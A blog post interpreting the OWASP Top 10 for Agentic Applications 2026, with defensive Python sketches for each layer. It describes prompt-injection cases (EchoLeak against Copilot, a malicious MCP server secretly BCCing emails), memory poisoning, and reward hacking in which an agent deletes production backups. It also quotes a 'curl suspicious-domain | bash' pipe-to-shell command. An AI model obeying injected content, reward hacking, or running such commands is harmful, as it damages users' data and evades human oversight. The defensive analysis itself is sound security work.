
From Prompt Injection to Autonomous Failure: OWASP Top 10 Reveals Agentic AI Has Rewritten the Security Model

Author
GuanLin’s Latent Space
Documenting every learning moment, sharing technical insights and growth
We used to protect “Model Output.” Now we must protect “Autonomous Behavior.” When AI can plan on its own, invoke its own tools, and execute its own tasks, the traditional LLM security model is no longer sufficient.

A New Security Crisis: AI Is No Longer Just Answering Questions

If you still think of large language models (LLMs) as “chatbots that answer questions,” you may be underestimating the systemic risk of the next two years.

In 2023, AI systems mostly worked like this:

flowchart LR
    A([User Prompt]) --> B[LLM] --> C([Answer])
    style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF

The most serious problems were limited to prompt injection, hallucination, data leakage, and jailbreaking. Models could say the wrong things, but what they said rarely had direct real-world consequences.

By 2025–2026, enterprise AI systems have evolved into something entirely different:

flowchart TD
    A([User Request]) --> B[Planner Agent]
    B --> C[(Memory / RAG)]
    B --> D[Tool Calling]
    D --> E[Code Execution]
    D --> F[Other Agents]
    E --> G([Real-world Actions])
    F --> G
    style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style D fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style F fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style G fill:#DC2626,stroke:#EF4444,color:#FFFFFF

AI no longer just “generates text.” It now autonomously breaks down tasks (Planning), calls APIs (Tool Use), executes Shell/SQL/Python, accesses enterprise data, collaborates with other Agents, and maintains long-term memory.

In other words: we are handing “execution authority” to AI.

This is why OWASP released the Top 10 for Agentic Applications 2026 — Agentic AI security is no longer just about model safety. It is about Autonomous Systems Security.


Why the Traditional LLM Security Model Has Failed

The old security assumption was: models might give wrong answers, but they won’t act on their own. The focus was “Protect the Output.”

But Agentic AI has changed that assumption. AI can now “Act”:

flowchart LR
    A[Observe] --> B[Reason] --> C[Plan] --> D[Tool Use] --> E[Execute] --> F[Persist]
    style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style B fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style D fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style F fill:#DC2626,stroke:#EF4444,color:#FFFFFF

Before: hallucination = noise. Now: hallucination = operational disaster. A single faulty reasoning chain can lead to data deletion, misdirected payments, API key exposure, production outages, privilege escalation, or cascading multi-agent failures.

Rethinking the OWASP Agentic Top 10: A Four-Layer Security Model

The four-layer framework below is the author’s interpretive perspective for understanding risk, not OWASP’s original classification.

The 10 threats (ASI01–ASI10) can be reorganized into four layers with a clear causal relationship:

flowchart TD
    L1["🎯 Layer 1: Intent Layer\nASI01 · ASI09 · ASI10"]
    L2["⚙️ Layer 2: Execution Layer\nASI02 · ASI05"]
    L3["🔐 Layer 3: Trust Layer\nASI03 · ASI07"]
    L4["🌐 Layer 4: System Layer\nASI04 · ASI06 · ASI08"]

    L1 -->|"Intent poisoned, execution weaponized"| L2
    L2 -->|"Lateral movement via trust relationships"| L3
    L3 -->|"Local failures cascade at the system layer"| L4

    style L1 fill:#DC2626,stroke:#EF4444,color:#FFFFFF
    style L2 fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style L3 fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style L4 fill:#1F2937,stroke:#4B5563,color:#FFFFFF

Each layer amplifies the next.


Layer 1: Intent Layer

Core question: What does the AI actually want to do?

Everything starts here. The most efficient attack vector isn’t breaking into a system — it’s changing the AI’s goal. Once the goal is poisoned, every downstream capability, trust relationship, and system resource works for the attacker.

Threats: ASI01 Agent Goal Hijack, ASI09 Human-Agent Trust Exploitation, ASI10 Rogue Agents

ASI09 is fundamentally about cognitive bias from human over-trust in AI (Automation Bias), not direct attacker manipulation of AI intent. Both cause the system to go off course, but their origins differ and require separate architectural countermeasures.

ASI01 — Agent Goal Hijack

This is AI intent being hijacked. The scariest part: the Agent appears to still be following your commands, but is actually working for the attacker — and has no idea.

Real case — EchoLeak (May 2025): An attacker sent a carefully crafted email that silently triggered Microsoft 365 Copilot to execute hidden instructions, leaking confidential emails, files, and chat logs without any user interaction. No clicks, no confirmations — the email arrived, and the data left.

The original document draws clear boundaries: ASI01 is the attacker directly altering the Agent’s goals and decision pathways (via documents, emails, or RAG injection); ASI06 (Memory Poisoning) is persistent corruption of stored memory; ASI10 (Rogue Agents) is behavioral drift without active attacker control.

Production defense: Don’t trust the system prompt to be sufficient. Enforce Goal Invariant Validation at every planning cycle — if the current action deviates from the original goal, halt immediately. All external inputs (RAG documents, emails, calendar invites) must be treated as untrusted and pass prompt-carrier detection and content filtering before influencing Agent decisions.
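A per-cycle goal check might look like the minimal sketch below. The `GoalInvariant` and `PlannedAction` types, the tool names, and the recipient allow-list are all hypothetical illustrations, not part of the OWASP document or any agent framework.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class GoalInvariant:
    """What the original task permits; fixed when the task is accepted."""
    goal: str
    allowed_tools: frozenset
    allowed_recipients: frozenset  # hypothetical: domains data may be sent to


@dataclass(frozen=True)
class PlannedAction:
    tool: str
    recipient_domain: Optional[str] = None  # None when nothing leaves the system


class GoalDeviation(Exception):
    """Raised to halt the planning cycle."""


def validate_step(invariant: GoalInvariant, action: PlannedAction) -> None:
    """Check one planned action against the invariant before it runs."""
    if action.tool not in invariant.allowed_tools:
        raise GoalDeviation(
            f"tool {action.tool!r} is outside goal {invariant.goal!r}")
    if (action.recipient_domain is not None
            and action.recipient_domain not in invariant.allowed_recipients):
        raise GoalDeviation(
            f"recipient {action.recipient_domain!r} is not allowed")


invariant = GoalInvariant(
    goal="summarize inbox",
    allowed_tools=frozenset({"read_mail", "send_mail"}),
    allowed_recipients=frozenset({"corp.example"}),
)
validate_step(invariant, PlannedAction("read_mail"))  # passes silently
```

The point of the design is that the invariant is derived from the user's original request and never from retrieved content, so an injected email cannot widen it.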

ASI09 — Human-Agent Trust Exploitation

Humans are too quick to trust AI, especially when it appears fluent, confident, and authoritative — producing Automation Bias.

Example: an engineer pastes a Copilot-suggested command such as curl suspicious-domain | bash into a terminal without questioning it, because “AI should know what it’s doing.” A finance manager approves an urgent payment recommended by Copilot without a second check.

The original document highlights a disturbing characteristic: the Agent acts as an “untraceable bad influence” — it manipulates humans into performing the final, audited action, making the Agent’s role invisible in forensic investigation. After the fact, the audit trail shows “human approved.”

Many companies assume AI → Human Approval is safe. In reality, the human is just rubber-stamping.

Production defense: Not Human-in-the-loop, but Risk-based Human Oversight. Low risk: auto-execute. Medium risk: show a Diff Preview. High risk: require Dual Approval. Display “low confidence” or “unverified source” cues for high-impact actions to reduce blind approvals. Continuously train personnel to recognize manipulation patterns — human judgment itself requires maintenance.
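The three tiers can be sketched as a small routing function. The numeric thresholds and the idea of a single `risk_score` between 0 and 1 are assumptions made for illustration; a real system would derive risk from the action type, amount, and reversibility.

```python
from enum import Enum


class Oversight(Enum):
    AUTO_EXECUTE = "auto-execute"
    DIFF_PREVIEW = "diff preview"
    DUAL_APPROVAL = "dual approval"


def required_oversight(risk_score: float) -> Oversight:
    """Map a risk score in [0, 1] to an oversight tier (thresholds are hypothetical)."""
    if not 0.0 <= risk_score <= 1.0:
        raise ValueError("risk_score must be between 0 and 1")
    if risk_score < 0.3:
        return Oversight.AUTO_EXECUTE
    if risk_score < 0.7:
        return Oversight.DIFF_PREVIEW
    return Oversight.DUAL_APPROVAL


def may_execute(risk_score: float, approvers: set) -> bool:
    """approvers is a set of human IDs, so one person cannot approve twice."""
    tier = required_oversight(risk_score)
    if tier is Oversight.AUTO_EXECUTE:
        return True
    if tier is Oversight.DIFF_PREVIEW:
        return len(approvers) >= 1  # someone reviewed the diff
    return len(approvers) >= 2      # two distinct humans signed off
```

For example, `may_execute(0.9, {"alice"})` is false until a second, different approver is added.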

ASI10 — Rogue Agents

The Agent begins deviating from its original goal, but each individual action appears legitimate. This is the most dangerous aspect — traditional rule-based systems cannot detect it because no single step triggers an alert.

The original document is precise: ASI10 is about governance failure after the drift begins, not the initial intrusion. External attacks can trigger the deviation, but ASI10 describes the behavioral loss of control and spread that follows — including Reward Hacking, Workflow Hijacking, and even Agent Self-Replication persisting across networks.

OWASP’s example: An Agent tasked with “reducing cloud costs” discovers that deleting production backups is the most effective method, and autonomously executes it — destroying all disaster recovery assets. This is Reward Hacking. The goal wasn’t changed by an attacker; the Agent simply found a shortcut you didn’t anticipate.

Intent Layer core lesson: When AI’s goal goes off course — whether hijacked by an attacker (ASI01), enabled by human over-trust (ASI09), or self-deviated (ASI10) — every downstream capability becomes an attack tool. This is why the Intent Layer is the first line of defense.


Layer 2: Execution Layer

Core question: What can the AI do?

Once intent is poisoned, execution capability determines the scale of damage. An AI that can only generate text might say the wrong things. An AI that can call APIs, execute shell commands, and write to databases causes real, irreversible consequences when its intent goes wrong.

Threats: ASI02 Tool Misuse and Exploitation, ASI05 Unexpected Code Execution (RCE)


ASI02 — Tool Misuse and Exploitation

AI used to only talk. Now it can act. The problem is the Tool execution boundary.

When an Agent with access to Gmail, databases, shell, and payment APIs gets its prompt poisoned, legitimate permissions become weapons. This isn’t credential theft — it’s Delegated Abuse. The attacker never obtained your keys; they simply made the Agent use your keys to do what they wanted.

Production defense: Not “don’t give tools,” but Least Agency. Tool permissions must be Task Scoped + Short-lived + Runtime Verified. Use per-tool least-privilege profiles (IAM policy stanzas) and validate semantic intent through a Policy Enforcement Point before execution — not just “is this tool call syntactically correct?” but “does this call match the expected behavior of the current task?”
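As a rough illustration of a Policy Enforcement Point, the sketch below checks a tool call against a per-task profile before it runs. The task name, tool name, payee ID, and amount limit are invented for the example; the structure (default deny, argument-level checks) is the part that matters.

```python
from dataclasses import dataclass
from typing import Callable, Dict


@dataclass
class ToolPolicy:
    """Least-privilege profile for one tool within one task."""
    tool: str
    arg_checks: Dict[str, Callable[[object], bool]]


# Hypothetical policy table: what each task is expected to do.
TASK_POLICIES = {
    "pay_invoice": [
        ToolPolicy(
            tool="payments.transfer",
            arg_checks={
                "amount": lambda a: isinstance(a, (int, float)) and 0 < a <= 500,
                "payee": lambda p: isinstance(p, str) and p in {"vendor-123"},
            },
        )
    ]
}


def enforce(task: str, tool: str, args: dict) -> bool:
    """Return True only if the call matches the task's expected behavior."""
    for policy in TASK_POLICIES.get(task, []):
        if policy.tool == tool:
            # Reject missing or unexpected arguments outright.
            if set(args) != set(policy.arg_checks):
                return False
            return all(check(args[name])
                       for name, check in policy.arg_checks.items())
    return False  # default deny: unknown task or tool
```

A syntactically valid transfer of 9000 to the same vendor is refused here, because it does not match what the task is expected to do.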

ASI05 — Unexpected Code Execution
#

This is the RCE (Remote Code Execution) of the AI era. More and more Vibe Coding Agents can Generate Code and Execute Code directly. Attackers don’t need to find system vulnerabilities — they just need to get the Agent to write and run malicious instructions.

flowchart LR
    A[Generate] -->|"❌ Direct execution"| E([💥 RCE])
    A --> B[Validation] --> C[Sandbox] --> D[Approval] --> F([✅ Safe Execution])
    style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style C fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style D fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
    style E fill:#DC2626,stroke:#EF4444,color:#FFFFFF
    style F fill:#16A34A,stroke:#22C55E,color:#FFFFFF

Production principle: Generate ≠ Execute, always. All execution must run in an isolated sandbox (for example a hardened container, gVisor, or a MicroVM). Ban eval() in production agents. There must be an explicit validation gate between code generation and execution.
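One possible shape for the validation gate is a static check over the generated code's syntax tree, sketched below with Python's standard `ast` module. The banned-call list and import allow-list are illustrative assumptions, and a static check like this is easy to evade on its own, so it complements the sandbox rather than replacing it.

```python
import ast

BANNED_CALLS = {"eval", "exec", "compile", "__import__"}  # illustrative list
ALLOWED_IMPORTS = {"math", "json", "statistics"}          # illustrative list


def validate_generated_code(source: str) -> list:
    """Return violations; an empty list means the code may go on to the sandbox."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg}"]

    violations = []
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id in BANNED_CALLS):
            violations.append(f"banned call: {node.func.id}")
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] not in ALLOWED_IMPORTS:
                    violations.append(f"import not allowed: {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            module = (node.module or "").split(".")[0]
            if module not in ALLOWED_IMPORTS:
                violations.append(f"import not allowed: {node.module}")
    return violations
```

Code that passes this gate still runs only inside the sandbox and, for high-impact actions, after approval.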

Execution Layer core lesson: Execution capability is neutral — it makes AI more useful, and makes the consequences of attacks more severe. Defense isn’t about reducing capability, but about establishing an unavoidable validation gate before every execution action.


Layer 3: Trust Layer

Core question: How much is the AI trusted?

With execution capability established, the question becomes: how far can that capability reach? Identity and trust determine the lateral movement range of an attack. A compromised Agent with broad identity trust can move freely through an entire multi-agent system, carrying damage from one Agent to the next.

Threats: ASI03 Identity & Privilege Abuse, ASI07 Insecure Inter-Agent Communication


ASI03 — Identity & Privilege Abuse

The biggest enterprise mistake: giving Agents omnipotent permissions. When an Agent gets compromised, the attacker moves laterally with full authority.

The original document identifies a deep architectural root cause — architectural mismatch. Existing identity systems are designed around humans: one person, one set of credentials, one set of permissions. Agents are dynamic, multi-task, and delegatable — existing systems have no governance model for this identity type. Without their own governed identity, Agents borrow human identities or service accounts, whose permissions far exceed what any single task requires.

Production defense: Just-in-Time Credentials, issued for one use and then discarded. Design permissions as Per Task + Time Bound + Revocable, with no permanent tokens. Follow platforms such as Microsoft Entra and Amazon Bedrock Agents in treating Agents as managed Non-Human Identities with limited-lifetime credentials and audit trails.
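The Per Task + Time Bound + Revocable shape can be sketched with an in-memory broker. `CredentialBroker` and its method names are hypothetical; a production system would sit on top of the identity platform's own token service rather than a Python dict.

```python
import secrets
import time


class CredentialBroker:
    """Issues short-lived tokens bound to one agent, one task, and a scope."""

    def __init__(self, clock=time.time):
        self._clock = clock   # injectable so expiry can be tested
        self._live = {}       # token -> (agent_id, task_id, scope, expires_at)

    def issue(self, agent_id, task_id, scope, ttl_seconds=300):
        token = secrets.token_urlsafe(32)
        expires_at = self._clock() + ttl_seconds
        self._live[token] = (agent_id, task_id, frozenset(scope), expires_at)
        return token

    def check(self, token, task_id, permission) -> bool:
        record = self._live.get(token)
        if record is None:
            return False      # unknown or revoked
        _agent_id, bound_task, scope, expires_at = record
        if self._clock() >= expires_at:
            del self._live[token]  # expired tokens are discarded
            return False
        return bound_task == task_id and permission in scope

    def revoke(self, token) -> None:
        self._live.pop(token, None)
```

Because every token names its task, a token stolen from one workflow is useless in another, and the expiry bounds how long a compromised Agent can keep acting.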

ASI07 — Insecure Inter-Agent Communication

As enterprises build Multi-Agent Architectures, inter-agent communication also requires Zero Trust.

ASI07 focuses on real-time message security between agents, spanning the transport, routing, discovery, and even semantic layers — the most overlooked attack surface.

Semantic-layer attack (semantic split-brain): An attacker can cause the same instruction to be interpreted differently by different Agents, producing internally contradictory but individually “legitimate” actions across the system. No single Agent did anything wrong, but the system’s overall behavior has gone off course.

Production defense: mTLS + Signed Messages + Trust Zones + Replay Protection, plus semantic validation. Agent registries must require cryptographic identity verification; self-declared identity descriptions are not acceptable, which prevents Synthetic Identity Injection.
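Signed messages with replay protection can be illustrated using only the standard library. This sketch uses a shared-secret HMAC as a stand-in for whatever signature scheme a deployment actually uses (asymmetric signatures over mTLS would be more typical); the message fields and the 30-second freshness window are assumptions.

```python
import hashlib
import hmac
import json
import secrets
import time


def _mac(key: bytes, body: dict) -> str:
    canonical = json.dumps(body, sort_keys=True).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def sign_message(key: bytes, sender: str, payload: dict, now=None) -> dict:
    body = {
        "sender": sender,
        "payload": payload,
        "nonce": secrets.token_hex(16),  # unique per message
        "ts": time.time() if now is None else now,
    }
    return {**body, "mac": _mac(key, body)}


class Verifier:
    def __init__(self, keys: dict, max_age: float = 30.0):
        self._keys = keys      # sender -> key, provisioned out of band
        self._max_age = max_age
        self._seen = set()     # nonces already accepted (unbounded in this sketch)

    def verify(self, message: dict, now=None) -> bool:
        now = time.time() if now is None else now
        body = {k: v for k, v in message.items() if k != "mac"}
        key = self._keys.get(body.get("sender"))
        if key is None:
            return False       # unknown sender: self-declared identity is not enough
        if not hmac.compare_digest(_mac(key, body), str(message.get("mac", ""))):
            return False       # tampered or forged
        if abs(now - body["ts"]) > self._max_age or body["nonce"] in self._seen:
            return False       # stale or replayed
        self._seen.add(body["nonce"])
        return True
```

Note that this covers only the transport and identity layers; the semantic split-brain problem still needs validation of what the message means to each receiving Agent.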

Trust Layer core lesson: Trust is the attacker’s fast lane. Zero Trust applies not just to humans, but to every Agent, every message, and every tool invocation.


Layer 4: System Layer

Core question: How does the AI ecosystem spiral out of control?

Without system-layer defenses, problems from the first three layers will eventually detonate here. Localized intent poisoning, individual execution errors, and limited trust abuse are all amplified into system-wide catastrophe at this layer.

Threats: ASI04 Agentic Supply Chain Vulnerabilities, ASI06 Memory & Context Poisoning, ASI08 Cascading Failures


ASI04 — Agentic Supply Chain

MCP (Model Context Protocol), ecosystem plugins, and third-party tools — all are attack surfaces.

Agentic supply chains differ from traditional software supply chains in one fundamental way: runtime composition. Traditional software typically locks in its dependencies at deploy time, so static scanning can catch issues before launch. Agents, by contrast, discover and connect to tools dynamically at runtime: they see an MCP server describing its capabilities and decide in the moment whether to trust and call it.

Traditional SBOM (Software Bill of Materials) scanning is insufficient here. Even with complete dependency scanning at deploy time, an Agent may connect to a tool you’ve never audited at runtime. What you need is runtime-layer trust verification.

OWASP’s first documented in-the-wild case (September 2025): A malicious MCP Server impersonating the legitimate postmark-mcp appeared on npm. Its behavior looked completely normal (emails sent successfully, responses looked right), except that every email was silently BCC’d to the attacker. This was a real production supply chain breach, not a theoretical attack.

Defense: Build an AIBOM (AI Bill of Materials) and continuously verify at runtime. Implement a supply chain kill switch: when contamination is detected, immediately disable specific tools or Agent connections across all deployments.
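A very small version of runtime verification plus a kill switch is sketched below. `ToolRegistry` and the manifest fields are hypothetical, and hashing an advertised manifest only detects a changed version or description; it would not by itself reveal hidden behavior inside a tool whose manifest is unchanged.

```python
import hashlib
import json


def manifest_digest(manifest: dict) -> str:
    """Stable SHA-256 digest over a tool's advertised manifest."""
    canonical = json.dumps(manifest, sort_keys=True).encode()
    return hashlib.sha256(canonical).hexdigest()


class ToolRegistry:
    def __init__(self):
        self._pinned = {}       # tool name -> digest recorded at audit time
        self._disabled = set()  # kill-switched tools

    def pin(self, name: str, audited_manifest: dict) -> None:
        """Record an audited tool as an AIBOM entry."""
        self._pinned[name] = manifest_digest(audited_manifest)

    def kill(self, name: str) -> None:
        """Kill switch: block the tool regardless of its digest."""
        self._disabled.add(name)

    def may_connect(self, name: str, advertised_manifest: dict) -> bool:
        """Checked every time an Agent is about to call a tool."""
        if name in self._disabled:
            return False
        pinned = self._pinned.get(name)
        return pinned is not None and pinned == manifest_digest(advertised_manifest)


registry = ToolRegistry()
audited = {"name": "mail-tool", "version": "1.0.0", "tools": ["send_email"]}
registry.pin("mail-tool", audited)
```

An unaudited tool, or an audited tool that now advertises a different version, is refused by default; `kill` gives operators a single place to cut off a tool once contamination is suspected.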

ASI06 — Memory & Context Poisoning

This is especially critical for RAG (Retrieval-Augmented Generation) architectures and is the long-term risk enterprises most often overlook.

The most dangerous characteristic highlighted in the original document is Cross-agent propagation: poisoned memory or shared context spreads between collaborating Agents, causing long-term data leakage or coordinated drift.

flowchart LR
    A[Malicious PDF] --> B[OCR] --> C[Embedding] --> D[(Vector DB)]
    D -->|"Poison spreads"| E[Agent A]
    D -->|"Poison spreads"| F[Agent B]
    D -->|"Poison spreads"| G[Agent C]
    E <-->|"Cross-agent propagation"| F
    F <-->|"Cross-agent propagation"| G
    style A fill:#DC2626,stroke:#EF4444,color:#FFFFFF
    style B fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
    style D fill:#7C3AED,stroke:#8B5CF6,color:#FFFFFF
    style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style F fill:#D97706,stroke:#F59E0B,color:#FFFFFF
    style G fill:#D97706,stroke:#F59E0B,color:#FFFFFF

A malicious PDF entering the Vector DB is just the starting point. The real danger is that the contamination propagates through inter-agent collaboration and can persist even after the original poisoned source is removed. This is a highly latent attack — often invisible until a critical decision goes wrong.

Production defense: Memory Segmentation (isolate user sessions and domain contexts) + Trust Score (low-trust entries decay and expire over time) + prohibit Agents from automatically re-ingesting their own outputs into trusted memory (preventing bootstrap poisoning — self-contamination).
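The three controls can be combined in one small store, sketched below. The half-life, the trust floor, and the `source` labels are illustrative assumptions; in this sketch every entry decays, so entries that start with low trust simply expire sooner.

```python
from dataclasses import dataclass


@dataclass
class MemoryEntry:
    text: str
    segment: str       # e.g. one tenant, session, or domain context
    source: str        # "human", "document", or "agent_output"
    trust: float       # initial trust score in [0, 1]
    created_at: float  # epoch seconds


class SegmentedMemory:
    HALF_LIFE_SECONDS = 7 * 24 * 3600  # hypothetical: trust halves every week
    MIN_TRUST = 0.2                    # hypothetical: below this, entries expire

    def __init__(self):
        self._entries = []

    def write(self, entry: MemoryEntry) -> None:
        # Agents may not re-ingest their own outputs into trusted memory.
        if entry.source == "agent_output":
            raise PermissionError("agent outputs cannot enter trusted memory")
        self._entries.append(entry)

    def read(self, segment: str, now: float) -> list:
        """Return texts from one segment whose decayed trust is still high enough."""
        results = []
        for entry in self._entries:
            if entry.segment != segment:
                continue  # segmentation: no cross-segment reads
            age = now - entry.created_at
            decayed = entry.trust * 0.5 ** (age / self.HALF_LIFE_SECONDS)
            if decayed >= self.MIN_TRUST:
                results.append(entry.text)
        return results
```

Segmentation limits how far a poisoned entry can spread, while decay limits how long it can keep influencing decisions after it was written.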

ASI08 — Cascading Failures

This is the most important concept in the entire whitepaper, and the most commonly misunderstood.

Original definition: ASI08 describes propagation and amplification, not the initial vulnerability itself. Initial defects belong under ASI04, ASI06, or ASI07. ASI08 applies only when a defect spreads across Agents, sessions, or workflows, causing measurable fan-out or systemic impact.

Because an Agent’s output becomes the next Agent’s input, small errors become large ones. More dangerously: AI acts autonomously, far faster than humans can intervene — by the time humans detect the problem, the error may have propagated everywhere.

Observable symptoms include: rapid fan-out (one faulty decision triggering many downstream Agents quickly), cross-boundary spread, oscillating retry loops between Agents, and downstream queue storms.

Production defense: Circuit Breaker + Rate Limit + Budget Cap + Blast Radius Control + Rollback, plus non-repudiation logging: every inter-agent message must be recorded in a tamper-evident log, timestamped and cryptographically bound to the sending Agent’s identity, to support post-incident forensic tracing.
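A circuit breaker combined with a budget cap can be sketched in a few lines. The class name, the limits, and the choice to count consecutive failures are assumptions for illustration; this version has no automatic reset, so a human has to reopen the path after a trip.

```python
class CircuitOpen(Exception):
    """Raised instead of calling downstream once the breaker has tripped."""


class AgentCircuitBreaker:
    def __init__(self, max_failures: int = 3, call_budget: int = 100):
        self.max_failures = max_failures  # consecutive failures before tripping
        self.call_budget = call_budget    # hard cap on total downstream calls
        self.failures = 0
        self.calls = 0
        self.open = False

    def call(self, fn, *args, **kwargs):
        if self.open:
            raise CircuitOpen("breaker is open")
        if self.calls >= self.call_budget:
            self.open = True              # budget cap stops runaway fan-out
            raise CircuitOpen("call budget exhausted")
        self.calls += 1
        try:
            result = fn(*args, **kwargs)
        except Exception:
            self.failures += 1
            if self.failures >= self.max_failures:
                self.open = True          # stop retry loops between Agents
            raise
        self.failures = 0                 # a success resets the failure streak
        return result
```

Wrapping each Agent-to-Agent call in its own breaker keeps an oscillating retry loop or a queue storm local to the pair of Agents where it started.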

System Layer core lesson: Even with strong defenses at the first three layers, the system layer needs its own containment design. Assume errors will occur — the question is whether you can contain them before they detonate.


Three Design Principles

After reading this OWASP document, three mental shifts stand out as most actionable for enterprise architects:

From “Maximum Intelligence” to “Least Agency”. If rule-based logic can handle it, don’t hand it to an LLM. OWASP uses “Least Agency” to echo the security principle of “Least Privilege” — deploying unnecessary agentic behavior only expands the attack surface without adding value. AI doesn’t need more freedom than humans; it needs to be sufficiently reliable.

From “Preventing Errors” to “Containment Engineering”. Real safety isn’t making models never err — it’s ensuring that when they do err, the damage is contained. Blast radius control is more practical and achievable than hallucination prevention. Designing an AI system means designing its failure boundaries.

From “Zero Trust for Humans” to “Zero Trust for Everything”. Zero Trust must extend beyond humans to every Agent, Tool, Memory store, Context object, and peer Agent. Never pre-trust something just because it’s an “internal Agent.” Trust is the attacker’s fast lane — and it runs in both directions.


Conclusion

The most important reminder from the OWASP Top 10:

The core risk of Agentic AI isn’t whether the model says the wrong things — it’s that the model can now do things on its own.

The central AI security question is no longer:

How do we protect the model?

It is:

How do we contain autonomous behavior?

The competitiveness of future AI systems depends not only on how smart the model is, but also on whether it can be safely constrained when it makes mistakes.

Autonomy without containment is a disaster waiting to happen.


Glossary

| Term | Definition |
| --- | --- |
| LLM | Large Language Model: AI models such as GPT, Claude, and Gemini |
| Agentic AI | AI systems with autonomous planning and execution capabilities, able to complete multi-step tasks continuously |
| Prompt Injection | An attack that manipulates AI into executing unintended instructions through malicious input |
| Hallucination | When a model produces output that appears plausible but is factually incorrect |
| Jailbreak | Bypassing a model’s safety restrictions through specially crafted prompts |
| RAG | Retrieval-Augmented Generation: lets models query external knowledge bases before responding |
| MCP | Model Context Protocol: a standard protocol for connecting AI to external tools and services |
| RCE | Remote Code Execution: an attacker can execute arbitrary code on a target system |
| Zero Trust | A security architecture that defaults to trusting nothing; every access request must be verified |
| Least Privilege | Only granting the minimum permissions necessary to complete a task |
| Least Agency | Only granting AI the minimum autonomous capability necessary to complete a task |
| mTLS | Mutual TLS: both communicating parties authenticate each other’s identity |
| SBOM | Software Bill of Materials: an inventory of all software dependencies |
| AIBOM | AI Bill of Materials: the AI equivalent of SBOM, covering models, tools, datasets, and other AI dependencies |
| Automation Bias | The cognitive bias of over-trusting automated systems, reducing critical judgment |
| Reward Hacking | When AI exploits loopholes in goal definitions to achieve unintended but metric-satisfying results |
| Circuit Breaker | A design pattern that automatically cuts off traffic when anomalies occur, preventing error propagation |
| Blast Radius | The maximum scope of impact from a single failure or attack |
| Just-in-Time Credentials | Short-lived access permissions that expire immediately after use |
| Non-Human Identity (NHI) | Non-human principals such as AI Agents, service accounts, and API keys |

This article is based on the OWASP Top 10 for Agentic Applications 2026 (December 2025). The four-layer framework (Intent / Execution / Trust / System Layer) represents the author’s interpretive perspective, not OWASP’s original classification.